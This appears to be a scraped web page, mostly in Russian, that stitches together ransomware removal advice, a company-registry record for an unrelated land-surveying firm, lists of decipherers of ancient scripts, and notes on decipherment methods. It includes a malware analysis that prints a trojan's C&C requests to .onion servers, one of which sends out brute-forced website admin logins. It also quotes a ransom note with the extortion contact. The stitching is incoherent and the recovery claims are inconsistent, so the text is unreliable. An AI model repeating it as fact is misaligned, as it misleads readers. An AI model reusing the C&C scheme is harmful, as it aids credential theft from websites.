Что такое расширение файла crypted?

Как вылечить вирус-шифровальщик

Исходя из вышенаписанного можно сделать вывод, что если страшная надпись на рабочем столе еще не появилась, а вы уже увидели первые файлы с непонятными длинными названиями из хаотичного набора различных символов, немедленно достаньте компьютер из розетки.

Именно так, грубо и бескомпромиссно. Тем самым вы остановите алгоритм работы зловреда и сможете хоть что-то спасти. К сожалению, в моем случае сотрудник этого не знал и потерял все. Твою мать…

Вишенкой на торте для меня был тот факт, что, оказывается, данный вирус без проблем шифрует все подключенные к ПК съемные носители и сетевые диски с правами доступа на запись. Именно там и были резервные копии.

Теперь о лечении. Первое, что нужно понимать: вирус лечится, но файлы так и останутся зашифрованными. Возможно, навсегда. Сам процесс лечения ничего сложного из себя не представляет.

Для этого необходимо подключить винчестер к другому компьютеру и просканировать утилитами вроде Dr.Web CureIt или Kaspersky Virus Removal Tool. Можно для надежности двумя поочередно. Если нести зараженный винт на другой комп сцыкотно, загрузитесь с Live CD.

Как правило, подобные антивирусные решения без проблем находят и удаляют шифровальщик. Но иногда они ничего не обнаруживают, поскольку вирус, сделав свою работу, может сам удалиться из системы. Такой вот сучий потрох, которые заметает все следы и затрудняет его изучение.

Предвижу вопрос, почему антивирус сразу не предотвратил проникновения нежелательно ПО на компьютер? Тогда бы и проблем не было. На мой взгляд, на данный момент антивирусы проигрывают битву с шифровальщиками и это очень печально.

К тому же, как я уже говорил, подобные вредоносные программы работают на основе легальных криптографических методов. То есть получается, что их работа как бы и не является противоправной с технической точки зрения. В этом и заключается трудность их выявления.

Постоянно выходят новые модификации, которые попадают в антивирусные базы только после заражения. Так что, увы, в этом случае 100% защиты быть не может. Только бдительное поведение при работе на ПК, но об этом чуть позже.

По данным портала ЗАЧЕСТНЫЙБИЗНЕСОБЩЕСТВО С ОГРАНИЧЕННОЙ ОТВЕТСТВЕННОСТЬЮ «ДЕШИФРОВЩИК»По данным портала ЗАЧЕСТНЫЙБИЗНЕС0541010285

О компании:
ООО «ДЕШИФРОВЩИК» ИНН 0541010285, ОГРН 1020502634943 зарегистрировано 14.06.2002 в регионе Республика Дагестан по адресу: 367013, респ Дагестан, город Махачкала, улица Г.цадасы, 49, 26. Статус: Действующее. Размер Уставного Капитала 10 000,00 руб.

Руководителем организации является: Генеральный Директор — Бабаев Джума Джабраилович, ИНН . У организации 1 Учредитель. Основным направлением деятельности является «землеустройство». На 01.01.2020 в ООО «ДЕШИФРОВЩИК» числится 4 сотрудника.

Рейтинг организации: Средний  подробнее
Должная осмотрительность (отчет) ?

Статус: ?
Действующее

Дата регистрации: По данным портала ЗАЧЕСТНЫЙБИЗНЕС

?
По данным портала ЗАЧЕСТНЫЙБИЗНЕС

14.06.2002

Налоговый режим: ?
По данным портала ЗАЧЕСТНЫЙБИЗНЕС
Упрощенная система налогообложения (УСН) (на 01.01.2020)

Среднесписочная численность работников: ?
01.01.2020 – 4 ↓ -5 (9 на 01.01.2019 г.)
Фонд оплаты труда / Средняя заработная плата Доступно в Премиум Доступе ?

ОГРН  ?	1020502634943    присвоен: 08.01.2003
ИНН  ?	0541010285
КПП  ?	057201001
ОКПО  ?	12828000
ОКТМО  ?	82701370000

Реквизиты для договора 
?
 …Скачать

Проверить блокировку cчетов 
?

Контактная информация (887… Посмотреть
?

Отзывы об организации 
?: 0   Написать отзыв

Юридический адрес: ?
По данным портала ЗАЧЕСТНЫЙБИЗНЕС
367013, респ Дагестан, город Махачкала, улица Г.цадасы, 49, 26
получен 09.06.2011
зарегистрировано по данному адресу:
По данным портала ЗАЧЕСТНЫЙБИЗНЕС

По данным портала ЗАЧЕСТНЫЙБИЗНЕС
Руководитель Юридического Лица ?По данным портала ЗАЧЕСТНЫЙБИЗНЕС
Генеральный ДиректорПо данным портала ЗАЧЕСТНЫЙБИЗНЕС

Бабаев Джума Джабраилович

ИНН ?	По данным портала ЗАЧЕСТНЫЙБИЗНЕС
действует с	По данным портала ЗАЧЕСТНЫЙБИЗНЕС 09.06.2011

По данным портала ЗАЧЕСТНЫЙБИЗНЕС
Иное Должностное Лицо ?По данным портала ЗАЧЕСТНЫЙБИЗНЕС
Технический ДиректорПо данным портала ЗАЧЕСТНЫЙБИЗНЕС

Бабаев Магомед Джумаевич

ИНН ?	По данным портала ЗАЧЕСТНЫЙБИЗНЕС
действует с	По данным портала ЗАЧЕСТНЫЙБИЗНЕС 09.06.2011

Учредители ? ()
Уставный капитал: По данным портала ЗАЧЕСТНЫЙБИЗНЕС
10 000,00 руб.

100%	Бабаев Джума Джабраилович По данным портала ЗАЧЕСТНЫЙБИЗНЕС 10 000,00руб., 11.03.2010 , ИНН

Основной вид деятельности: ?По данным портала ЗАЧЕСТНЫЙБИЗНЕС
71.12.46 землеустройство

Дополнительные виды деятельности:

Единый Реестр Проверок (Ген. Прокуратуры РФ) ?

Реестр недобросовестных поставщиков: ?
По данным портала ЗАЧЕСТНЫЙБИЗНЕС

не числится.

Данные реестра субъектов МСП: ?

Критерий организации	По данным портала ЗАЧЕСТНЫЙБИЗНЕС Микропредприятие

Налоговый орган ?
По данным портала ЗАЧЕСТНЫЙБИЗНЕС
Инспекция Федеральной Налоговой Службы По Советскому Району Г.махачкалы
Дата постановки на учет: По данным портала ЗАЧЕСТНЫЙБИЗНЕС
01.07.1996

Регистрация во внебюджетных фондах

Фонд	Рег. номер	Дата регистрации
ПФР  ?	017055022049	По данным портала ЗАЧЕСТНЫЙБИЗНЕС 17.09.1993
ФСС  ?	050210166505001	По данным портала ЗАЧЕСТНЫЙБИЗНЕС 04.04.1997

Уплаченные страховые взносы за 2018 год (По данным ФНС):

— на обязательное социальное страхование на случай временной нетрудоспособности и в связи с материнством: 7 371,80 руб. ↓ -0.01 млн. (18 948,00 руб. за 2017 г.)

— на обязательное пенсионное страхование, зачисляемые в Пенсионный фонд Российской Федерации: 55 924,00 руб. ↓ -0.09 млн. (143 748,00 руб. за 2017 г.)

— на обязательное медицинское страхование работающего населения, зачисляемые в бюджет Федерального фонда обязательного медицинского страхования: 23 071,38 руб. ↓ -0 млн. (23 216,22 руб. за 2017 г.)

Коды статистики

ОКАТО  ?	82401370000
ОКОГУ  ?	4210014
ОКОПФ  ?	12300
ОКФС  ?	16

Финансовая отчетность ООО «ДЕШИФРОВЩИК» ?

 ?

Финансовый анализ отчетности за 2019 год
Коэффициент текущей ликвидности:

>2
Коэффициент капитализации:

Рентабельность продаж (ROS):

0.1 Подробный анализ…

В качестве Поставщика: , на сумму

В качестве Заказчика: , на сумму

По данным портала ЗАЧЕСТНЫЙБИЗНЕС

Судебные дела ООО «ДЕШИФРОВЩИК» ?

найдено по ИНН: По данным портала ЗАЧЕСТНЫЙБИЗНЕС

Ответчик: По данным портала ЗАЧЕСТНЫЙБИЗНЕС , на сумму: 10 761 136,00 руб.

найдено по наименованию (возможны совпадения): По данным портала ЗАЧЕСТНЫЙБИЗНЕС

По данным портала ЗАЧЕСТНЫЙБИЗНЕС

Исполнительные производства ООО «ДЕШИФРОВЩИК»
?

найдено по наименованию и адресу (возможны совпадения): По данным портала ЗАЧЕСТНЫЙБИЗНЕС

По данным портала ЗАЧЕСТНЫЙБИЗНЕС

Лента изменений ООО «ДЕШИФРОВЩИК»
?

Не является участником проекта ЗАЧЕСТНЫЙБИЗНЕС ?

Известные дешифровщики

Авторы удачных дешифровок

• Ибн Вахшия (частично дешифровал египетские иероглифы, впоследствии его труд был забыт)
• Принсеп, Джеймс (индийские письменности брахми и кхароштхи)
• Шампольон, Жан-Франсуа (египетские иероглифы)
• Гротефенд, Георг Фридрих (персидская клинопись)
• Роулинсон, Генри Кресвик (персидская клинопись, начало дешифровки других клинописей)
• Сейс, Арчибальд Генри (начало дешифровки лувийских иероглифов и урартского языка)
• Смит, Джордж (ассириолог) (кипрское письмо)
• Вентрис, Майкл и Чедвик, Джон (критское Линейное письмо Б)
• Кнорозов, Юрий (письменность майя, письменность долины Инда — последняя дешифровка не общепризнана)
• Рэй, Джон (лингвист) — дешифровка карийского письма
• Вилгельм Томсен (тюркские руны)

Авторы неудачных дешифровок

• Кирхер, Афанасий (неудачная дешифровка египетских иероглифов)
• Саси, Сильвестр де (неудачная дешифровка египетских иероглифов)
• Юнг, Томас (неудачная дешифровка египетской демотики)
• Георгиев, Владимир (несколько неудачных дешифровок средиземноморских письменностей)
• Грозный, Бедржих (дешифровка хеттского языка, несколько неудачных дешифровок средиземноморских письменностей)
• Фридрих, Йоганнес (завершение дешифровки урартского языка), труды по истории письма
• Мериджи, Пьеро (участие в дешифровке ряда малоазийских алфавитов, труды по критскому письму)
• Дорм, Эдуар Поль (необщепризнанная дешифровка протобиблского письма)
• Молчанов, Аркадий Анатольевич (работы по дешифровке критского письма, неудачная дешифровка Фестского диска)
• Гордон, Сайрус (неудачная попытка прочесть критские надписи по-семитски)
• Зиттиг, Эрнст (неудачные дешифровки критского и кипро-минойского письма)
• Кондратов, Александр Михайлович — автор теоретических трудов по проблемам дешифровки
• Турчанинов, Георгий Фёдорович — российский историк и филолог, автор не признанных современной наукой дешифровок сразу нескольких древних письменностей, которым он приписывал кавказское происхождение
• Шеворошкин, Виталий Викторович — прорыв в дешифровке карийского письма (тем не менее, окончательная дешифровка Дж. Рэя существенно отличалась от предложенной Шеворошкиным)

.crypted files can be restored for free

Nevertheless, the majority of ransomware viruses are undefeatable, and there is no way to restore files unless authors of the malware reveal decryption tool. However, in case of .Crypted ransomware attack, malware researchers have good news. There’s a free decryption tool that can restore files with .crypted extension. You can find full data recovery instructions in the guide presented below virus’ removal instructions.

To remove Crypted virus, we recommend using Reimage Reimage Cleaner Intego or another trustworthy malware removal tool. It is not recommended to play with this ransomware and attempt to remove it manually unless you know what you’re doing. If you lack knowledge about computer viruses, please do not try to uninstall this virus manually.

IMPORTANT NOTE. Please remember that .crypted file extension virus differs from .encrypted file extension virus. The latter extension is used by many different ransomware viruses such as CryptoLocker, Keranger and Crypren. 

Загружаемое вредоносное ПО: троянец-брутфорсер паролей к веб-сайтам

Среди вредоносных программ, которые скачивает Trojan-Ransom.Win32.Shade, встречается троянец-брутфорсер паролей к web-сайтам. По своей внутренней организации брутфорсер очень напоминает самого шифровальщика – наиболее вероятно, он является проектом тех же авторов. Скачиваемый зловред получил вердикт Trojan.Win32.CMSBrute.

Общие черты семейства CMSBrute

• Написан на C++ с применением STL и собственных классов.
• Статически слинкован с клиентом Tor.
• Использует библиотеки boost (threads), curl, OpenSSL.
• В каждый сэмпл зашит адрес одного сервера C&C, всего в разных сэмплах были найдены адреса трех C&C серверов. Все C&C находятся в сети Tor, они отличаются от адресов, встреченных в образцах Trojan-Ransom.Win32.Shade.
• Все строки (вместе с именами импортируемых функций) зашифрованы алгоритмом AES, расшифровываются при старте программы, после чего происходит динамическое заполнение таблицы импорта.
• Обычно упакован UPX, в распакованном виде имеет размер 2080-2083 КБ.
• Копирует себя в одну из директорий диска C с именем csrss.exe.
• Скачивает дополнительные dll-плагины. Плагины содержат код для определения установленной системы управления контентом (CMS) на атакуемом веб-сайте, поиска админ-панели и подбора паролей. Были обнаружены плагины, поддерживающие сайты на основе Joomla, WordPress и DataLife Engine.

Коммуникация с командным сервером

В каждом образце Trojan.Win32.CMSBrute содержится адрес одного сервера C&C. Серверы находятся в сети Tor, коммуникация с ними осуществляется с использованием статически прилинкованного к троянцу клиента Tor.

Сэмпл отправляет следующие запросы на C&C сервер:

1. Регистрация нового бота:GET http://<server>.onion/reg.php?n=ID&b=build&v=version&sf=stageID – идентификатор зараженного компьютера; вычисляется по алгоритму, незначительно отличающемуся от такового в шифровальщике Shade;build – идентификатор конкретного сэмпла зловреда; был встречен только build 1;version – версия зловреда; была встречена только версия 1;stage – этап работы троянца.

2. Запрос на получение URL-адресов для скачивания или обновления плагинов-dllGET http://<server>.onion/upd.php?n=ID&b=build&v=version&p=plugins

3. Запрос задания на определение CMS на сайте и проверки логинов и паролей:GET http://<server>.onion/task.php?n=ID&b=build&v=version&p=pluginsplugins – версии установленных плагинов-dll.Ответ от сервера приходит в формате json и содержит адреса атакуемых сайтов и словарь для подбора паролей.

4. Отправка отчета о брутфорсе:POST http://<server>.onion/rep.php?n=ID&b=build&v=version&rep=reportreport – json-строка, содержащая отчет о найденных СMS на веб-сайте и подобранных логинах и паролях от админ-панели.

Backup files for the later use, in case of the malware attack

Computer users can suffer various losses due to cyber infections or their own faulty doings. Software issues created by malware or direct data loss due to encryption can lead to problems with your device or permanent damage. When you have proper up-to-date backups, you can easily recover after such an incident and get back to work.

It is crucial to create updates to your backups after any changes on the device, so you can get back to the point you were working on when malware changes anything or issues with the device causes data or performance corruption. Rely on such behavior and make file backup your daily or weekly habit.

When you have the previous version of every important document or project you can avoid frustration and breakdowns. It comes in handy when malware occurs out of nowhere. Use Data Recovery Pro for the system restoring purpose.

About the author

Olivia Morelli
— Ransomware analyst

If this free removal guide helped you and you are satisfied with our service, please consider making a donation to keep this service alive. Even a smallest amount will be appreciated.

Contact Olivia Morelli
About the company Esolutions

References

1. Danny Palmer. Ransomware: This free tool lets you decrypt files locked by a common version of the malware. ZDNet. Technology News, Analysis, Comments and Product Reviews.
2. Public Key and Private Keys. Comodo. Resources.
3. Simon Usborne. Digital gold: why hackers love Bitcoin. The Guardian. Latest US news, world news, sports, business, opinion, analysis and reviews.
4. Decrypt latest Nemucod ransomware with Emsisoft’s free decrypter. Emsisfot Blog. Latest security and malware news.
5. UdenVirus official website. UdenVirus. Malware Removal Advice, Cyber Security Tips.

Removal guides in other languages

Crypted viruso išinstaliavimas

Het Crypted virus verwijder gids

убить Crypted вирус

Pozbywanie się wirusa Crypted

Wie man den Crypted-Virus loswird

Termine Crypted virus

Guia de remoção do Crypted virus

Guía de eliminación de Crypted

Borttagningsguide för viruset Crypted

Mikä on Crypted virus

Fjerning av Crypted virus

Matikan virus Crypted

Crypted vírus eltávolítása

移除 Crypted 病毒

Deinstaliraj virus Crypted

Crypted ウィルスを消去する

şterge virusul Crypted

Remove Crypted virus

This entry was posted on 2017-12-14 at 02:28 and is filed under Ransomware, Viruses.

Описание вируса шифровальщика Crusis (Dharma)

Дальше началось расследование. Зашифрованные файлы получили расширение .combo. Их было очень много. Шифровальщик начал работать поздно вечером, примерно в 23 часа. Повезло — бэкап пострадавших дисков как раз был завершен к этому времени. Данные потеряны не были вообще, так как успели забэкапиться в конце рабочего дня. Я сразу же начал восстановление из бэкапа, который лежит на отдельном сервере без доступа по smb.

За ночь вирус успел зашифровать примерно 400 Гб данных на сетевых дисках. Банальное удаление всех зашифрованных файлов с расширением combo заняло продолжительное время. Я сначала хотел удалить их все разом, но когда только подсчет этих файлов длился уже 15 минут, я понял, что дело бесполезное в данный момент времени. Вместо этого стал накатывать актуальные данные, а почистил диски от зашифрованных файлов уже после.

Сразу скажу прописную истину. Наличие актуальных, надежных бэкапов делает любую проблему разрешимой. Что делать, если их нет, либо они не актуальны, даже не представляю

Я всегда уделяю повышенное внимание бэкапам. Холю, лелею их и никому не даю к ним доступа.

После того, как запустил восстановление зашифрованных файлов, появилось время спокойно разобраться в ситуации и повнимательнее посмотреть на вирус-шифровальщик Crusis (Dharma). Тут меня ждали сюрпризы и удивления. Источником заражения стала виртуальная машина с Windows 7 с проброшенным rdp портом через резервный канал. Порт был не стандартный — 33333. Думаю, это была основная ошибка, использовать такой порт. Он хоть и не стандартный, но очень популярный. Конечно, лучше вообще не пробрасывать rdp, но в данном случае это было действительно необходимо. К слову, сейчас, вместо этой виртуалки, используется тоже виртуальная машина с CentOS 7, у нее в докере запущен контейнер с xfce и браузером. Ну и доступов у этой виртуалки никуда нет, только куда нужно.

Что пугает во всей этой истории. Виртуальная машина была с обновлениями. Шифровальщик начал работу в конце августа. Когда было сделано заражение машины, точно уже не установить. Вирус много чего подтер в самой виртуалке. Обновления на эту систему ставились в мае. То есть каких-то старых открытых дырок на ней быть не должно. Я теперь вообще не знаю, как оставлять rdp порт доступным из интернета. Слишком много кейсов, где это действительно нужно. Например, терминальный сервер на арендованном железе. Не будешь же к каждому серверу арендовать еще и шлюз для vpn.

Теперь ближе к делу и самому шифровальщику. У виртуальной машины был отключен сетевой интерфейс, после этого запустил ее. Меня встретила стандартная табличка, какую я уже много раз видел у других шифровальщиков.

All your files have been encrypted!
All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail supportdata@cock.li
Write this ID in the title of your message 501BED27
In case of no answer in 24 hours write us to theese e-mails:supportdata@cock.li
You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. 
Free decryption as guarantee
Before paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) 
How to obtain Bitcoins
The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. 
https://localbitcoins.com/buy_bitcoins 
Also you can find other places to buy Bitcoins and beginners guide here: 
 
Attention!
Do not rename encrypted files. 
Do not try to decrypt your data using third party software, it may cause permanent data loss. 
Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

На рабочем столе были 2 текстовых файла с именами FILES ENCRYPTED.TXT следующего содержания:

all your data has been locked us
You want to return?
write email supportdata@cock.li

Любопытно, что изменились права на директорию Рабочий стол. У пользователя не было прав на запись. Видимо, вирус сделал это, чтобы пользователь случайно не удалил информацию в текстовых файлах с рабочего стола. Там же на рабочем столе была директория troy, в которой был сам вирус — файл l20VHC_playload.exe.

Программа автоматического восстановления файлов (дешифратор)

Известно весьма неординарное обстоятельство. Данная инфекция стирает исходные файлы в незашифрованном виде. Процесс шифрования с целью вымогательства, таким образом, нацелен на их копии. Это предоставляет возможность таким программным средствам как восстановить стертые объекты, даже если надежность их устранения гарантирована. Настоятельно рекомендуется прибегнуть к процедуре восстановления файлов, ее эффективность не вызывает сомнений.

Теневые копии томов

В основе подхода предусмотренная Windows процедура резервного копирования файлов, которая повторяется в каждой точке восстановления

Важное условие работы данного метода: функция “Восстановление системы” должна быть активирована до момента заражения. При этом любые изменения в файл, внесенные после точки восстановления, в восстановленной версии файла отображаться не будут

Резервное копирование

Это самый лучший среди всех не связанных с выкупом способов. Если процедура резервного копирования данных на внешний сервер применялась до момента атаки программы-вымогателя на Ваш компьютер, для восстановления зашифрованных файлов понадобиться попросту войти в соответствующий интерфейс, выбрать необходимые файлы и запустить механизм восстановления данных из резерва. Перед выполнением операции необходимо удостовериться, что вымогательское ПО полностью удалено.

Что делать? Платить или не платить

Если вы дочитали до этого заголовка, значит, файлы у вас по-прежнему стабильно зашифрованы. И тут вопрос: как поступить дальше? Ведь в случае шифровки крайне значимых файлов может быть парализована работа даже крупных предприятий, не говоря уже о малом бизнесе.

Первое, можно выполнить инструкцию мошенника и заплатить выкуп. Но статистика «Лаборатории Касперского» говорит о том, что каждое пятое предприятие так и не получило ключ с дешифратором после оплаты.

Это может происходить по разным причинам. Например, вирусом могли воспользоваться не сами создатели, у которых есть закрытый ключ, а мошенники-посредники.

Они просто модифицировали код зловреда, указав в файле выкупа свои данные, а второго ключа-то у них нет. Деньги получили и свалили. А вы кукуйте дальше.

В общем, не будут врать, всех технических нюансов я и сам не знаю. Но в любом случае заплатив вымогателям, вы мотивируете их на продолжение подобной деятельности. Ведь раз это работает и приносит деньги, почему нет.

Но в интернете я нашел как минимум две конторы, которые обещают помочь в этой беде и расшифровать даже файлы с расширением crypted000007. В одну из них я с большой боязнью обратился.

Скажу честно, ребята мне не помогли, поскольку сразу сказали, что дешифровщика у них нет, но могут попробовать восстановить около 30% оригинальных файлов, которые удалил вирус, с помощью низкоуровневого сканирования.

Я подумал и отказался. Но спасибо им, что лапши на уши не вешали, уделили время и все трезво пояснили. Ну и раз у них нет ключа, значит, они не должны взаимодействовать с мошенниками.

Но есть другая, более «интересная» контора, которая дает 100% гарантию на успех операции. Ее сайт находится вот по этому адресу:

Я попробовал пошерстить по профильным форумам, но так и не смог найти отзывов реальных клиентов. То есть все о ней знают, но мало кто пользовался. Замкнутый круг.

Эти ребята работают по факту полученного результата, никаких предоплат нет. Опять же повторюсь, дают гарантию на расшифровку даже crypted000007. Значит, у них есть ключ и декриптор. Отсюда вопрос: а откуда у них это добро? Или я чего-то не понимаю?

Не хочу говорить что-плохое, возможно, они добрые и пушистые, работают честно и помогают людям. Хотя технически без мастер-ключа это просто невозможно. В любом случае против них все же нашлась компрометирующая информация.

Хотя если вас вдруг приперло к стенке дальше некуда, попробуйте обратиться. Но все на собственных страх и риск. И деньги, много денег не забудьте.

Причина проблемы: вирус xtbl

Вирус-шифровальщик xtbl получил своё название из-за того, что зашифрованные им пользовательские документы получают расширение.xtbl.
Обычно кодировщики оставляют в теле файла ключ для того, чтобы универсальная программа-дешифратор могла восстановить информацию в исходном виде. Однако вирус предназначен для других целей, поэтому вместо ключа на экране появляется предложение заплатить некоторую сумму по анонимным реквизитам.

Как работает вирус xtbl

Вирус попадает на компьютер с помощью рассылаемых по электронной почте писем с заражёнными вложениями, представляющими собой файлы офисных приложений. После того как пользователь открыл содержимое сообщения, вредоносная программа начинает поиск фотографий, ключей, видео, документов и так далее, а затем с помощью оригинального сложного алгоритма (гибридное шифрование) превращает их в xtbl-хранилища.

Вирус вносит себя в список автозагрузки. Для этого он добавляет записи в реестре Windows в разделах:

• HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce;
• HKCU\Software\Microsoft\Windows\CurrentVersion\Run;
• HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce.

Заражённый компьютер работает стабильно, система не «падает», но в оперативной памяти постоянно находится небольшое приложение (или два) с непонятным названием. А папки с рабочими файлами пользователя приобретают странный вид.

На рабочем столе вместо заставки появляется сообщение:

Тот же текст содержится в созданном файле How to decrypt your files.txt. Адрес электронной почты, код, запрашиваемая сумма могут меняться.

Почему не стоит платить вымогателям

Соглашаться на сотрудничество с вымогателями нельзя не только из-за моральных принципов. Это неразумно и с практической точки зрения.

1. Мошенничество. Не факт, что злоумышленники смогут расшифровывать ваши файлы. Не служит доказательством и возвращённая вам одна из якобы расшифрованных фотографий — это может быть просто украденный до шифрования оригинал. Заплаченные деньги уйдут без пользы.
2. Возможность повтора. Подтвердив свою готовность платить, вы станете более желанной добычей для повторной атаки. Возможно, в следующий раз ваши файлы будут иметь другое расширение, а на заставке появится иное сообщение, но деньги отправятся тем же людям.
3. Конфиденциальность. Пока файлы хоть и зашифрованы, но находятся на вашем компьютере. Договорившись с «честными злодеями», вы будете вынуждены отправить им всю свою личную информацию. Алгоритм не предусматривает получение ключа и самостоятельную расшифровку, только пересылку файлов декодировщику.
4. Заражение компьютера. Ваш компьютер всё ещё заражён, поэтому расшифровка файлов не является полным решением проблемы.

Как защитить систему от вируса

Универсальные правила защиты от вредоносных программ и минимизации ущерба помогут и в этом случае.

1. Остерегаться случайных связей. Не нужно открывать письма, полученные от незнакомых отправителей, включая рекламу и бонусные предложения. В крайнем случае можно их прочитать, предварительно сохранив вложение на диске и проверив его антивирусом.
2. Пользоваться защитой. Антивирусные программы постоянно пополняют библиотеки вредоносных кодов, поэтому актуальная версия защитника не пропустит большинство вирусов на компьютер.
3. Распределять доступ. Вирус нанесёт значительно больший вред, если проникнет через учётную запись администратора. Лучше работать от имени пользователя, тем самым резко сужая возможности заражения.
4. Создавать резервные копии. Важную информацию необходимо регулярно копировать на внешние носители, хранящиеся отдельно от компьютера. Также не следует забывать о создании резервных точек восстановления Windows.

Методы дешифровки

Сильно помогает наличие двуязычных документов, написанных на неизвестной письменности (неизвестном языке) и другой, известной. Именно Розеттский камень, попав в руки Шампольону, помог ему расшифровать египетскую письменность.
Необходимо иметь достаточное количество документов, чтобы можно было оценить общее число используемых в письменности символов

Это позволяет делать предположения по поводу одного из первых вопросов расшифровки: какой была система письма — алфавит или абугида (несколько десятков символов), слоговое письмо (порядка сотни) или идеографическая (несколько тысяч)?
Очень важно правильно определить группу языков, к которой принадлежит расшифровываемый. В особенности верно при расшифровке фонетических письменностей

Линейное письмо Б позволила расшифровать гипотеза, что оно записывало греческий язык. Аналогично, догадка о близости угаритского языка с ивритом привела к разгадке угаритского алфавита. А этрусский язык не поддается расшифровке именно потому, что не удается найти язык, родственный ему.
Не стоит придавать большого значения форме букв (сравнительный метод привёл в тупик известных дешифровщиков Б. Грозного, В. Георгиева и др.). Практически все известные системы оперируют одним и тем же набором примитивов (круг, крест, чёрточка и т. п.) Необходимо искать внутреннюю структуру слов и фраз, выделять повторяющиеся конструкции и, по возможности, предлагать их интерпретации. Этот же принцип используется при раскодировании шифрованных сообщений — так, линейное письмо Б было расшифровано М. Вентрисом, архитектором по профессии.
Логико-комбинаторные методы использовал в своей работе уже Гротефенд в начале XIX в., однако начиная со XX в. они получают особенное распространение в связи с тем, что традиционный сравнительный метод оказывается непригоден, когда достоверно неизвестны ни система письма, ни язык. Математический анализ, который провела А. Кобер, позволил выявить некоторые особенности грамматики надписей Линейного письма Б, а также предположить наличие общих гласных или согласных для некоторых слоговых знаков.